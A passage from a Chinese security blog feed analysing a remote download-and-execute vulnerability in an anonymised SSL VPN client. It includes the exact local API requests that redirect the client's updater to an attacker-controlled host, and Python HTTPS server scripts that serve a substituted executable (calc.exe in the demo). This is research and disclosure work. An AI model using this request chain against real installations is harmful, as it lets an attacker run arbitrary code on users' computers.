        \u7ea2\u961f\u6210\u5458\u7684\u5206\u5de5<\/strong>\uff1a\u660e\u786e\u6bcf\u4e2a\u6210\u5458\u7684\u5206\u5de5\uff0c\u5e76\u4e14\u7ed3\u5408\u6210\u679c\u6765\u770b\u5206\u5de5\u7684\u843d\u5b9e\u7a0b\u5ea6\uff1b<\/p>\n\n
        \u6f14\u4e60\u8fc7\u7a0b\u7684\u95ee\u9898<\/strong>\uff1a\u603b\u7ed3\u6f14\u4e60\u8fc7\u7a0b\u4e2d\u53d1\u73b0\u7684\u95ee\u9898\uff0c\u627e\u51fa\u95ee\u9898\u4ea7\u751f\u7684\u539f\u56e0\uff0c\u6709\u89e3\u51b3\u65b9\u6848\u7684\u63d0\u51fa\u89e3\u51b3\u65b9\u6848\uff0c\u6ca1\u6709\u7684\u5c31\u590d\u76d8\u4f1a\u4e0a\u8fdb\u884c\u4ea4\u6d41\u3002<\/p>\n","pubDate":"2022-08-18T00:00:00+08:00","link":"https:\/\/gh0st.cn\/archives\/2022-08-18\/1","guid":"https:\/\/gh0st.cn\/archives\/2022-08-18\/1"},{"title":"\u67d0VPN\u5ba2\u6237\u7aef\u8fdc\u7a0b\u4e0b\u8f7d\u6587\u4ef6\u6267\u884c\u6a21\u62df\u9006\u5411\u5206\u6790","description":"
        \u67d0VPN\u5ba2\u6237\u7aef\u8fdc\u7a0b\u4e0b\u8f7d\u6587\u4ef6\u6267\u884c\u6a21\u62df\u9006\u5411\u5206\u6790<\/h1>\n\n
        \u524d\u8a00<\/h2>\n\n
        2021\u5e743\u6708\uff0c\u6211\u901a\u8fc7\u9ed1\u76d2\u7684\u65b9\u5f0f\u6316\u6398\u51fa\u67d0VPN\u5ba2\u6237\u7aef\u7684\u8fdc\u7a0b\u4e0b\u8f7d\u6587\u4ef6\u6267\u884c\u6f0f\u6d1e\uff0c\u5176\u539f\u7406\u5c31\u662f\u901a\u8fc7VPN\u5ba2\u6237\u7aef\u672c\u8eab\u6240\u5f00\u542f\u7684Web\u670d\u52a1API\u63a5\u53e3\u4fee\u6539\u5ba2\u6237\u7aef\u66f4\u65b0\u8bf7\u6c42\u5730\u5740\uff0c\u7ee7\u800c\u901a\u8fc7API\u63a7\u5236\u5ba2\u6237\u7aef\u7a0b\u5e8f\u8fdb\u884c\u81ea\u52a8\u8bf7\u6c42\u66f4\u65b0\uff0c\u5bfc\u81f4\u5ba2\u6237\u7aef\u4e0b\u8f7d\u6211\u81ea\u5b9a\u4e49\u7684\u66f4\u65b0\u7a0b\u5e8f\uff0c\u5e76\u8fd0\u884c\u3002<\/p>\n\n
        \u9ed1\u76d2\u4fa7\u7684\u6f0f\u6d1e\u6316\u6398\u5f80\u5f80\u5e26\u6709\u8bb8\u591a\u7684\u4e0d\u786e\u5b9a\u6027\uff0c\u6240\u4ee5\u6211\u5c1d\u8bd5\u4ece\u767d\u76d2\uff08\u9006\u5411\uff09\u4fa7\u7684\u89d2\u5ea6\u53bb\u5165\u624b\u5206\u6790\u8be5\u6f0f\u6d1e\u7684\u5f62\u6210\uff0c\u5e76\u4ee5\u6b64\u4e3a\u57fa\u7840\u5f62\u6210\u5bf9\u8fd9\u79cd\u6f0f\u6d1e\u7684\u6a21\u578b\u8bb0\u5fc6\uff0c\u5e76\u4e14\u5728\u540e\u7eed\u7684\u7814\u7a76\u4e2d\u4e5f\u7528\u7c7b\u4f3c\u601d\u8def\u5bf9\u5176\u4ed6VPN\u5ba2\u6237\u7aef\u8fdb\u884c\u6f0f\u6d1e\u6316\u6398\uff0c\u6210\u679c\u8fd8\u7b97\u4e0d\u9519\u3002<\/p>\n\n
        \u6ce8<\/strong>\uff1a\u6587\u4e2d\u53ef\u80fd\u4f1a\u5b58\u5728\u7b14\u8bef\u6216\u63cf\u8ff0\u4e0d\u51c6\u786e\u7b49\u9519\u8bef\uff0c\u8fd8\u671b\u5404\u4f4d\u4e0d\u541d\u8d50\u6559\uff0c\u591a\u591a\u65a7\u6b63\u3002<\/p>\n\n
        \u9ed1\u76d2\u4fa7<\/h2>\n\n
        \u5728\u6b63\u5f0f\u9006\u5411\u4e4b\u524d\uff0c\u5efa\u8bae\u8bfb\u8005\u5148\u9605\u8bfb\u4e00\u4e0b\u9ed1\u76d2\u4fa7\u7684\u6f0f\u6d1e\u6316\u6398\u8fc7\u7a0b\uff0c\u5982\u82e5\u8bfb\u8005\u5df2\u7ecf\u719f\u77e5\u8be5\u6f0f\u6d1e\uff0c\u53ef\u8d8a\u8fc7\u8be5\u7ae0\u8282\u76f4\u63a5\u9605\u8bfb\u300c\u9006\u5411\u4fa7\u300d\u7ae0\u8282\u5185\u5bb9\u3002<\/p>\n\n
        \u6f0f\u6d1e\u56de\u987e<\/h3>\n\n
        \u968f\u4fbf\u627e\u4e00\u4e2a\u5730\u65b9\u4e0b\u8f7dVPN\u5ba2\u6237\u7aef\u4e0b\u8f7d\u5b89\u88c5\u3002<\/p>\n\n
        \u5b89\u88c5\u5b8c\u4e4b\u540e\u8bbf\u95eeVPN\u7684\u9875\u9762\uff0c\u53d1\u73b0VPN\u4f1a\u81ea\u52a8\u4e0b\u8f7d\u7ec4\u4ef6\u66f4\u65b0\uff1a<\/p>\n\n
        \"\"<\/p>\n\n
        \u8fd9\u4e4b\u95f4\u4e5f\u8bb8\u662f\u56e0\u4e3a\u5b58\u5728\u7740\u67d0\u4e9b\u8054\u7cfb\uff0c\u53ef\u4ee5\u6df1\u5165\u7684\u770b\u4e00\u4e0b\u3002<\/p>\n\n
        \u5bf9\u672c\u5730\u7684\u8bbf\u95ee<\/h4>\n\n
        \u91cd\u73b0\u4e0a\u8ff0\u95ee\u9898\uff0c\u901a\u8fc7F12<\/code>\u53d1\u73b0\u5f53\u8bbf\u95eeVPN\u7684\u767b\u9646\u9875\u9762\u4f1a\u5bf9\u672c\u5730127.0.0.1<\/code>\u8fdb\u884cHTTP(s)\u8bf7\u6c42\uff1a<\/p>\n\n
        \"\"<\/p>\n\n
        \u8fd9\u4e9b\u8bf7\u6c42\u5747\u4e3aGET\u8bf7\u6c42\u5e76\u9644\u5e26\u7740\u4e00\u4e9b\u53c2\u6570\uff0c\u6211\u628a\u5b83\u4e00\u4e00\u5217\u4e0b\u6765\uff1a<\/p>\n\n
        \"\"<\/p>\n\n
        \u672c\u5730\u6765\u770b\u4e00\u4e0b\u8fd9\u4e2a54530<\/code>\u7aef\u53e3\u5bf9\u5e94\u7684\u8fdb\u7a0b\u662f\u4ec0\u4e48\uff1a<\/p>\n\n
        \"\"<\/p>\n\n
        \u53d1\u73b0\u8fd9\u4e2a\u7aef\u53e3\u662fECAgent.exe\u5f00\u542f\u7684\uff0c\u5bfb\u627e\u5230\u5bf9\u5e94\u8fdb\u7a0b\u6587\u4ef6\u6240\u5728\u4f4d\u7f6e\uff1a<\/p>\n\n
        \"\"<\/p>\n\n
        \u786e\u8ba4\u8fd9\u662fXXX SSLVPN\u7684\u7a0b\u5e8f\uff0c\u90a3\u4e48\u5c31\u53ef\u4ee5\u5c06\u4e24\u8005\u8054\u7cfb\u5230\u4e00\u8d77\uff0c\u8bbf\u95eeVPN\u767b\u5f55\u9996\u9875\u4f1a\u89e6\u53d1\u5bf9127.0.0.1<\/code>\u7684\u8bbf\u95ee\u4ece\u800c\u5f15\u8d77VPN\u8fdb\u884c\u7ec4\u4ef6\u66f4\u65b0\u3002<\/p>\n\n
        \u66f4\u65b0\u5730\u5740\u53ef\u63a7<\/h4>\n\n
        \u901a\u8fc7\u4ee5\u4e0a\u7684\u5206\u6790\u53ef\u4ee5\u731c\u6d4b\u6574\u4e2a\u5927\u81f4\u6d41\u7a0b\uff0c\u4f46\u6211\u8bbe\u60f3\u4e00\u4e0b\u5982\u679c\u6211\u53ef\u4ee5\u63a7\u5236\u672c\u5730\u7684\u66f4\u65b0\u6307\u5411\u6211\u7684\u670d\u52a1\u5668\uff0c\u7136\u540e\u5c06\u66f4\u65b0\u7684\u7ec4\u4ef6\u5185\u5bb9\u66ff\u6362\u6210\u6076\u610f\u7a0b\u5e8f\uff0c\u5f53\u7a0b\u5e8f\u542f\u52a8\u7684\u65f6\u5019\u5c31\u542f\u52a8\u4e86\u6076\u610f\u7a0b\u5e8f\uff0c\u8fd9\u6837\u6211\u53ef\u4ee5\u62ff\u5230\u5b89\u88c5VPN\u5ba2\u6237\u7aef\u7684\u4f7f\u7528\u8005PC\u6743\u9650\u3002<\/p>\n\n
        \u518d\u56de\u5230\u4e4b\u524d\u7684\u672c\u5730\u94fe\u63a5\u5217\u8868\uff0c\u6839\u636e\u5bf9\u82f1\u6587\u7684\u7406\u89e3\uff0c\u53c2\u6570op\u7684\u503c\u5e94\u8be5\u4e3a\u5176\u5177\u4f53\u5bf9\u5e94\u8981\u6267\u884c\u7684\u52a8\u4f5c\uff1a<\/p>\n\n
        InitECAgent -> \u521d\u59cb\u5316\nGetEncryptKey -> \u83b7\u53d6\u52a0\u5bc6\u5bc6\u94a5\nDoConfigure -> \u914d\u7f6e\nCheckReLogin -> \u68c0\u67e5\u91cd\u65b0\u767b\u5f55\nCheckProxySetting -> \u68c0\u67e5\u4ee3\u7406\u8bbe\u7f6e\nUpdateControls -> \u66f4\u65b0\u63a7\u5236\nDoQueryService -> \u67e5\u8be2\u670d\u52a1\n<\/code><\/pre>\n\n
        \u7b2c\u4e00\u4e2a\u521d\u59cb\u5316\u7684\u8bf7\u6c42\u5b58\u5728\u53ef\u63a7\u53c2\u6570arg1\uff1a<\/p>\n\n
        https:\/\/127.0.0.1:54530\/ECAgent\/?op=InitECAgent&arg1=XXX%20443&callback=EA_cb10000\n<\/code><\/pre>\n\n
        \u53c2\u6570arg1=XXX%20443<\/code>\uff0c\u5bf9\u5e94\u503c\u4e5f\u5c31\u662fHOST+\u7a7a\u683c+\u7aef\u53e3\u7684\u683c\u5f0f\uff0c\u770b\u5230\u8fd9\u91cc\u57fa\u672c\u4e0a\u5c31\u4f1a\u6709\u4e00\u4e2a\u601d\u8def\uff0c\u5ba2\u6237\u7aef\u66f4\u65b0\u63a7\u4ef6\u662f\u4e0d\u662f\u6839\u636e\u8fd9\u4e2a\u6307\u5b9a\u503c\u5411\u5176\u53d1\u9001\u8bf7\u6c42\u66f4\u65b0\u7684\u5462\uff1f\u6211\u53ef\u4ee5\u53ea\u66ff\u6362\u7b2c\u4e00\u4e2a\u521d\u59cb\u5316\u8bf7\u6c42\u7684arg1\u53c2\u6570\u4e3a172.20.10.2 8000<\/code>\uff0c\u7136\u540e\u672c\u5730\u642d\u5efa\u4e00\u4e2aHTTP\u670d\u52a1\uff1a<\/p>\n\n
        python -m SimpleHTTPServer\n<\/code><\/pre>\n\n
        \u5176\u4ed6\u7684\u8bf7\u6c42\u539f\u5c01\u4e0d\u52a8\uff0c\u4f9d\u6b21\u8bf7\u6c42\u4e00\u904d\u90a3\u4e00\u4efdURL\u5217\u8868\uff08\u56fe\u4e3a\u8bf7\u6c42\u793a\u4f8b\uff09\uff1a<\/p>\n\n
        \"\"<\/p>\n\n
        \u670d\u52a1\u7aef\u6210\u529f\u6536\u5230\u8bf7\u6c42\uff0c\u4f46\u662f\u5374\u51fa\u73b0\u4e86\u9519\u8bef\u7684\u63d0\u793a\uff1a<\/p>\n\n
        \"\"<\/p>\n\n
        \u9996\u5148\u6211\u5df2\u7ecf\u9a8c\u8bc1\u4e86\u81ea\u5df1\u7684\u731c\u60f3\uff0c\u66f4\u65b0\u5730\u5740\u662f\u81ea\u5df1\u53ef\u63a7\u7684\uff0c\u5ba2\u6237\u7aef\u786e\u5b9e\u4f1a\u5411\u6211\u6307\u5b9a\u7684\u670d\u52a1\u7aef\u53d1\u9001\u8bf7\u6c42\uff0c\u4f46\u7531\u4e8e\u51fa\u73b0\u4e86\u9519\u8bef\uff0c\u6211\u4e0d\u77e5\u9053\u5ba2\u6237\u7aef\u8bbf\u95ee\u4e86\u54ea\u4e2a\u6587\u4ef6\uff0c\u4e5f\u4e0d\u77e5\u9053\u8bbf\u95ee\u6587\u4ef6\u4e4b\u540e\u505a\u4e86\u4ec0\u4e48\u52a8\u4f5c\u3002<\/p>\n\n
        \u670d\u52a1\u642d\u5efa<\/h4>\n\n
        \u73b0\u5728\u8981\u505a\u7684\u5c31\u662f\u642d\u5efa\u4e00\u4e2a\u5ba2\u6237\u7aef\u53ef\u4ee5\u6b63\u5e38\u8bbf\u95ee\u7684\u8bf7\u6c42\uff0c\u901a\u8fc7\u8fd9\u4e2a\u9519\u8bef\u5927\u81f4\u53ef\u4ee5\u77e5\u9053\uff0c\u6211\u642d\u5efa\u7684\u670d\u52a1\u7aef\u534f\u8bae\u548c\u5ba2\u6237\u7aef\u8bf7\u6c42\u4f7f\u7528\u7684\u534f\u8bae\u4e0d\u4e00\u81f4\uff0c\u672c\u673a\u6293\u4e2a\u5305\u53d1\u73b0\u5ba2\u6237\u7aef\u8bf7\u6c42\u7684\u662f HTTPS \u534f\u8bae\uff0c\u8fd9\u5c31\u9700\u8981\u642d\u5efa\u4e00\u4e2a HTTPS \u670d\u52a1\u4e86\u3002<\/p>\n\n
        \u5982\u4e0b\u811a\u672c\u57fa\u4e8ePython\u5e93\u5efa\u7acb\u4e00\u4e2a HTTPS \u670d\u52a1\uff1a<\/p>\n\n
        # openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes\n\nimport BaseHTTPServer, SimpleHTTPServer\nimport ssl\n\nhttpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 8000), SimpleHTTPServer.SimpleHTTPRequestHandler)\nhttpd.socket = ssl.wrap_socket (httpd.socket, certfile='.\/server.pem', server_side=True)\nhttpd.serve_forever()\n<\/code><\/pre>\n\n
        \u642d\u5efa\u8d77\u4e00\u4e2a HTTPS \u73af\u5883\u540e\u518d\u6b21\u590d\u73b0\u5982\u4e0a\u8bf7\u6c42\uff0c\u670d\u52a1\u7aef\u6536\u5230\u65e5\u5fd7\uff1a<\/p>\n\n
        \"\"<\/p>\n\n
        \u53ef\u4ee5\u770b\u89c1\u5ba2\u6237\u7aef\u4f1a\u8bbf\u95ee\u4e24\u4e2a\u6587\u4ef6\uff1a<\/p>\n\n
        \/com\/WindowsModule.xml\n\/com\/win\/XXXUD.exe\n<\/code><\/pre>\n\n
        \u5148\u4e0d\u7ba1xml\u6587\u4ef6\u662f\u600e\u4e48\u6837\u7684\uff0c\u53ef\u6267\u884c\u6587\u4ef6(exe)\u662f\u9700\u8981\u91cd\u89c6\u7684\uff0c\u4f46\u662f\u8fd9\u91cc\u901a\u8fc7\u63d0\u793a\u53ef\u4ee5\u770b\u51fa\u5ba2\u6237\u7aef\u53d1\u51fa\u7684\u8bf7\u6c42\u662fPOST\u8bf7\u6c42\uff0c\u4f46\u6211\u6240\u5199\u7684Python\u811a\u672c\u5efa\u7acb\u7684HTTPS\u670d\u52a1\u5e76\u4e0d\u652f\u6301POST\u65b9\u6cd5\uff0c\u6211\u9700\u8981\u91cd\u5199\u4e00\u4e0bHandler\uff1a<\/p>\n\n
        import BaseHTTPServer\nimport SimpleHTTPServer\nimport cgi\nimport ssl\n\nclass ServerHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):\n    def do_POST(self):\n        form = cgi.FieldStorage()\n        SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)\n\nHandler = ServerHandler\n\nhttpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 8000), Handler)\nhttpd.socket = ssl.wrap_socket (httpd.socket, certfile='.\/server.pem', server_side=True)\nhttpd.serve_forever()\n<\/code><\/pre>\n\n
        \u6700\u7ec8\u5982\u4e0a\u811a\u672c\u652f\u6301POST<\/code>\u65b9\u6cd5\uff0c\u5f53\u65f6\u7528POST<\/code>\u65b9\u6cd5\u8bf7\u6c42\u65f6\u5373\u8fd4\u56de\u6587\u4ef6\u5185\u5bb9\u3002<\/p>\n\n
        \u6700\u540e\uff0c\u62d6\u4e00\u4e2acalc.exe<\/code>\uff08\u8ba1\u7b97\u5668\uff09\u5230HTTPS\u7f51\u7ad9\u6839\u76ee\u5f55\u4e0b\u7684\/com\/win\/XXXUD.exe<\/code>\u3002<\/p>\n\n
        \u4f9d\u6b21\u8bf7\u6c42\uff08\u7ecf\u8fc7\u591a\u6b21\u590d\u73b0\u53d1\u73b0\uff0c\u8fd9\u4e09\u4e2a\u8bf7\u6c42\u624d\u662f\u91cd\u70b9\u7684\uff0c\u5176\u4ed6\u7684\u53ef\u4ee5\u5ffd\u7565<\/strong>\uff09\uff1a<\/p>\n\n
        https:\/\/127.0.0.1:54530\/ECAgent\/?op=InitECAgent&arg1=172.20.10.2 8000&callback=EA_cb10000\n\nhttps:\/\/127.0.0.1:54530\/ECAgent\/?op=CheckReLogin&arg1=3408a894633162c62188f98e92a221967dccfa5aafbd79b576714b4d1c392a4ad4b220d698efcd939c3b1b37467023e9380ee3abf0e492ee2efc736de757b80e973fe4c7d8af1af211a3f7ff3433cd9de975c76583efe7251dd1c0656f4384832998630359b65beb131cd8d287712462fa1b9e9acbc96dcc678b84cd57178c1a&token=50065256e83ff1bb9e01757d0d22b669&callback=EA_cb10003\n\nhttps:\/\/127.0.0.1:54530\/ECAgent\/?op=UpdateControls&arg1=BEFORELOGIN&callback=EA_cb10005\n<\/code><\/pre>\n\n
        \u4f1a\u53d1\u73b0\u5ba2\u6237\u7aef\u8bf7\u6c42\u4e4b\u540e\uff0c\u5c06\u6587\u4ef6\u4e0b\u8f7d\u5230\u672c\u5730\u5e76\u542f\u52a8\u8be5\u7a0b\u5e8f\uff0c\u6210\u529f\u5f39\u51fa\u8ba1\u7b97\u5668\uff1a<\/p>\n\n
        \"\"<\/p>\n\n
        \u767d\u76d2\uff08\u9006\u5411\uff09\u4fa7<\/h2>\n\n
        \u6211\u4ece\u767d\u76d2\uff08\u9006\u5411\uff09\u4fa7\u7684\u89d2\u5ea6\uff0c\u5e26\u5165Web\u6f0f\u6d1e\u6316\u6398\u601d\u7ef4\uff0c\u5728\u4e0d\u5b8c\u5168\u5206\u6790\u4f2a\u4ee3\u7801\u7684\u60c5\u51b5\u4e0b\u63a8\u7406<\/strong>\u51fa\u6f0f\u6d1e\u3002\uff08\u4ec5\u5c1d\u8bd5\u5e26\u5165\uff0c\u975e\u5b9e\u6218\uff0c\u4e0d\u559c\u52ff\u55b7\uff09<\/p>\n\n
        HTTP\u670d\u52a1\u7684\u5efa\u7acb<\/h3>\n\n
        \u786e\u5b9a\u8fdb\u7a0b<\/h4>\n\n
        \u9996\u5148\u8fdb\u884c\u67d0\u5ba2\u6237\u7aef\u7a0b\u5e8f\u7684\u5b89\u88c5\u5e76\u542f\u52a8\u5ba2\u6237\u7aef\u7a0b\u5e8f\uff0c\u7136\u540e\u9700\u8981\u4f7f\u7528Process Hacker\u4e4b\u7c7b\u7684\u5de5\u5177\u67e5\u770b\u8fdb\u7a0b\u6811\uff0c\u6839\u636e\u67d0\u72ec\u6709\u7684\u7279\u5f81\u5173\u952e\u8bcdXXX<\/code>\u627e\u5230\u6253\u5f00\u7684\u8fdb\u7a0b\u3002<\/p>\n\n
        \"\"<\/p>\n\n
        \u63a5\u7740\u6839\u636e\u8fdb\u7a0b\u67e5\u770b\u5176\u662f\u5426\u542f\u7528\u4e86\u7f51\u7edc\u670d\u52a1\uff08\u7aef\u53e3\u5f00\u653e\uff09\uff0c\u6211\u627e\u5230\u4e86ECAgent.exe<\/code>\u8fd9\u4e2a\u8fdb\u7a0b\uff0c\u5e76\u4e14\u89c2\u5bdf\u5230\u5176\u542f\u7528\u4e8654530<\/code>\u7aef\u53e3\uff1a<\/p>\n\n
        \"\"<\/p>\n\n
        \u5c1d\u8bd5\u4ee5HTTP\/HTTPS\u5f62\u5f0f\u8bbf\u95ee\u8be5\u7aef\u53e3\uff0c\u53d1\u73b0HTTPS\u8bbf\u95ee\u6709\u5177\u4f53\u8fd4\u56de\u5185\u5bb9\uff1a<\/p>\n\n
        \"\"<\/p>\n\n
        \u6545\u6b64\u5224\u65ad\u8be5\u8fdb\u7a0b\u6240\u542f\u7528\u7aef\u53e3\u4e3aHTTP\u670d\u52a1\u3002<\/p>\n\n
        \u5bfb\u627e\u5165\u53e3<\/h4>\n\n
        \u73b0\u5728\u9700\u8981\u627e\u5230\u7a0b\u5e8f\u5f00\u542fHTTP\u670d\u52a1\u7684\u5165\u53e3\u70b9\uff0c\u7531\u6b64\u624d\u80fd\u7ee7\u7eed\u53bb\u8ddf\u8fdb\u6574\u4e2a\u7a0b\u5e8f\u7684\u903b\u8f91\uff0c\u6211\u7b2c\u4e00\u65f6\u95f4\u60f3\u5230\u7684\u662f\u52a0\u8f7d\u7684DLL\u6587\u4ef6\uff0c\u9009\u62e9x32dbg\u9644\u52a0\u8fdb\u7a0b\u67e5\u770b\u5176\u6240\u52a0\u8f7d\u7684DLL\u6587\u4ef6\uff1a<\/p>\n\n
        \"\"<\/p>\n\n
        \u8fd9\u91cc\u6709\u5f88\u591a\u7cfb\u7edf\u7684DLL\u6587\u4ef6\uff0c\u53ef\u4ee5\u7565\u8fc7\uff0c\u4f18\u5148\u67e5\u770b\u4e0eECAgent.exe<\/code>\u6709\u5173\u8054\u6027\u7684DLL\u6587\u4ef6\uff0c\u4f8b\u5982\u5176\u540c\u7ea7\u76ee\u5f55\u4e0b\u7684\u51e0\u4e2aDLL\uff08\u4e5f\u90fd\u88ab\u52a0\u8f7d\u4e86\uff09\uff1a<\/p>\n\n
        \"\"<\/p>\n\n
        \u901a\u8fc7IDA\u6253\u5f00\u8fd9\u4e9bDLL\u6587\u4ef6\uff0c\u5e76\u4f7f\u7528\u5173\u952e\u8bcd127.0.0.1<\/code>\u30010.0.0.0<\/code>\u300154530<\/code>\u641c\u7d22\u76f8\u5173\u6570\u636e\uff0c\u627e\u5230\u5bf9\u5e94\u4f7f\u7528\u7684\u4ee3\u7801\uff08F5\u4f2a\u4ee3\u7801\uff0c\u5982\u4e0b\u56fe\u4e2d\u51fd\u6570\u5730\u5740\u4e0d\u4e00\u81f4\u65f6\u56e0\u4e3a\u6211\u5728\u8c03\u8bd5\u8fc7\u7a0b\u4e2d\u8fdb\u884c\u4e86REBASE\uff09\uff1a<\/p>\n\n
        \"\"<\/p>\n\n
        \u5982\u4e0a\u56fe\u4ee3\u7801\u4e2d\uff0c\u5f88\u660e\u663e\u8fd9\u662fWINSOCK\u7f16\u7a0b\u7684\u5199\u6cd5\uff0c\u5176\u4e2d\u7684\u7ed3\u6784\u4f53sockaddr<\/code>\u5b9e\u9645\u4e0a\u7b49\u4ef7\u4e8esockaddr_in<\/code>\uff0c\u4e8c\u8005\u552f\u4e00\u7684\u533a\u522b\u662fsockaddr_in<\/code>\u7ed3\u6784\u4f53\u6709\u660e\u786e\u7684\u6210\u5458\u53bb\u6307\u5b9aIP\u3001\u7aef\u53e3\uff0c\u800csockaddr<\/code>\u7ed3\u6784\u4f53\u5219\u662f\u4f7f\u7528\u6210\u5458sa_data<\/code>\uff08\u8fd9\u662f\u4e00\u4e2a\u6570\u7ec4\uff09\u53bb\u5305\u542bIP\u3001\u7aef\u53e3\u4e4b\u7c7b\u7684\u4fe1\u606f\u3002<\/p>\n\n
        \u5982\u4e0b\u56fe\u6240\u793a\uff0c\u5c31\u662f\u4e00\u4e2a\u4e24\u7ed3\u6784\u4f53\u4e4b\u95f4\u7684\u5bf9\u5e94\u56fe\uff0c\u7aef\u53e3\u5b58\u653e\u5728sa_data<\/code>\u7684\u7b2c0\u30011\u4f4d\uff0cIP\u5b58\u653e\u5728sa_data<\/code>\u7684\u7b2c2\u30013\u30014\u30015\u4f4d\uff1a<\/p>\n\n
        \"\"<\/p>\n\n
        \u4f46\u662f\u5728\u8fd9\u91cc\uff0c\u5b9e\u9645\u73af\u5883\u4e2d\u7684\u4ee3\u7801\u5bf9\u5e94\u7684\u7aef\u53e3\u5c45\u7136\u4e3a0\uff0c\u5b9e\u9645\u6d4b\u8bd5\uff0c\u53d1\u73b0\u8fd9\u6837\u7684\u8d4b\u503c\u662f\u65e0\u6cd5\u521b\u5efa\u6210\u529f\u7684\uff1a<\/p>\n\n
        \"\"<\/p>\n\n
        \u6211\u9677\u5165\u4e86\u6c89\u601d\uff0c\u83ab\u975e\u662f\u627e\u9519\u4f4d\u7f6e\u4e86\uff1f\u5e76\u4e0d\u662f\u8fd9\u4e2aDLL\u6587\u4ef6\u53bb\u5f00\u542f\u7684Web\u670d\u52a1\uff1f\u5e26\u7740\u8fd9\u4e00\u4efd\u6c89\u601d\u53bb\u627e\u4e86\u5f88\u591a\u4e2aDLL\uff0c\u53d1\u73b0\u5b83\u4eec\u8981\u4e48\u662f0\uff0c\u8981\u4e48\u5c31\u662f\u5176\u4ed6\u7aef\u53e3\uff0c\u800c\u4e0d\u662f\u5bf9\u5e94\u768454530<\/code>\u3002<\/p>\n\n
        \u5728\u4e0d\u65ad\u7684\u8bd5\u9519\u4e4b\u540e\uff0c\u6211\u53d1\u73b0\u4e86\u81ea\u5df1\u4ece\u672a\u53bb\u770b\u8fc7ECAgent.exe<\/code>\u672c\u8eab\uff0c\u800c\u5c1d\u8bd5\u53bbECAgent.exe<\/code>\u641c\u7d22\u5b57\u7b26\u4e32\u65f6\uff0c\u4e5f\u6ca1\u6709\u4ec0\u4e48\u6536\u83b7\uff0c\u4e8e\u662f\u60f3\u7740\u65e2\u7136\u4e00\u4e2aDLL\u4e2d\u7528\u5230\u4e86WINSOCK\u7684\u5e93\u53bb\u521b\u5efaSOCKET\uff0c\u90a3\u4e48\u5e94\u8be5\u90fd\u4f1a\u8fd9\u6837\u53bb\u7f16\u5199\uff0c\u6240\u4ee5\u5c1d\u8bd5\u4f7f\u7528\u521b\u5efaSOCKET\u670d\u52a1\u7279\u6709\u7684\u51fd\u6570\u540dbind<\/code>\u53bb\u5168\u5c40\u641c\u7d22\uff0c\u641c\u7d22\u7ed3\u679c\u5982\u4e0b\u56fe\u6240\u793a\uff1a<\/p>\n\n
        \"\"<\/p>\n\n
        \u63a5\u4e0b\u6765\u5c31\u662f\u4e00\u4e2a\u4e00\u4e2a\u51fd\u6570\u8ddf\u8fdb\u53bb\u67e5\u770b\uff0c\u6700\u7ec8\u6211\u53d1\u73b0\u4e86\u5b83sub_47FD60<\/code>\uff0c\u5982\u4e0b\u56fe\u6240\u793a\uff0csub_47FD60<\/code>\u662f\u521b\u5efaSOCKET\u7684\u51fd\u6570\uff0c\u4f46\u662f\u7ed1\u5b9a\u7684\u7aef\u53e3\u662f\u5165\u53c2\uff0c\u6240\u4ee5\u6211\u9700\u8981\u627e\u5230\u8c03\u7528\u8be5\u51fd\u6570\u7684\u51fd\u6570\uff0c\u4e5f\u5c31\u662fsub_47FEB0<\/code>\uff0c\u8fd9\u4e2a\u51fd\u6570\u4f1a\u4f7f\u7528\u4e00\u4e2a\u5faa\u73af\uff0c\u5165\u53c2\u7684\u7aef\u53e3\u4e5f\u4f1a\u968f\u7740\u5faa\u73af\u9012\u589e\uff08\u5e94\u8be5\u662f\u4e3a\u4e86\u9632\u6b62\u7aef\u53e3\u51b2\u7a81\u7684\u60c5\u51b5\uff09\uff0c\u5f53\u521b\u5efaSOCKET\u6210\u529f\u4e4b\u540e\u5c31\u76f4\u63a5\u8fd4\u56de\u3002<\/p>\n\n
        \"\"<\/p>\n\n
        \u5c06\u8fd9\u6bb5\u4f2a\u4ee3\u7801\u7f16\u8bd1\u6267\u884c\u4e00\u4e0b\uff0c\u8f93\u51fa\u7ed3\u679c\uff0c\u5c31\u53d1\u73b0\u7b2c\u4e00\u4e2a\u5165\u53c2\u7684\u7aef\u53e3\u662f54530<\/code>\uff0c\u5e76\u4e14\u7406\u8bba\u4e0a\u4e0d\u4f1a\u6709\u5176\u4ed6\u7684\u8f6f\u4ef6\u5360\u7528\u8fd9\u4e2a\u7aef\u53e3\uff0c\u6240\u4ee5\uff0c\u6211\u8ba4\u4e3aECAgent.exe<\/code>\u7684HTTP\u670d\u52a1\u7aef\u53e3\u5c31\u662f54530<\/code>\u3002<\/p>\n\n
        \u63a5\u53e3\u53c2\u6570\u7684\u5904\u7406\u903b\u8f91<\/h3>\n\n
        \u5206\u6790\u5b8cHTTP\u670d\u52a1\u7684\u5efa\u7acb\u4e4b\u540e\uff0c\u6211\u60f3\u8981\u77e5\u9053\u5176\u5177\u4f53\u5982\u4f55\u5904\u7406\u8bf7\u6c42\u53c2\u6570\uff0c\u53ef\u4ee5\u5728\u6b64\u51fd\u6570\u57fa\u7840\u4e0a\u7ee7\u7eed\u56de\u6eaf\u8ffd\u8e2a\u8c03\u7528\u94fe\uff0c\u4f46\u662f\u8fd9\u6837\u7684\u5de5\u4f5c\u91cf\u662f\u5de8\u5927\u7684\uff0c\u4e0d\u9002\u5408\u5feb\u901f\u5206\u6790\uff0c\u6240\u4ee5\u6211\u9996\u5148\u6839\u636eHTTP\u670d\u52a1\u7684\u54cd\u5e94\u5b57\u7b26\u4e32\u4e8eIDA\u4e2d\u641c\u7d22\uff0c\u518d\u6839\u636e\u5b57\u7b26\u4e32\u7684XREF\uff0c\u627e\u5230\u5176\u5bf9\u5e94\u4f7f\u7528\u5230\u7684\u51fd\u6570\uff1a<\/p>\n\n
        \"\"<\/p>\n\n
        \u5982\u4e0a\u56fe\u6240\u793a\u4ee3\u7801\uff0c\u5927\u6982\u610f\u601d\u5c31\u662f\u6709\u4e00\u4e2a\u6570\u7ec4\uff0c\u5b58\u5165\u4e86\u5b57\u7b26\u4e32\u548c\u51fd\u6570\u5730\u5740\uff0c\u6839\u636e\u5165\u53c2\u8fdb\u884c\u7c7b\u4f3c\u5bf9\u6bd4\uff0c\u800c\u540e\u53bb\u8c03\u7528\u51fd\u6570\u3002<\/p>\n\n
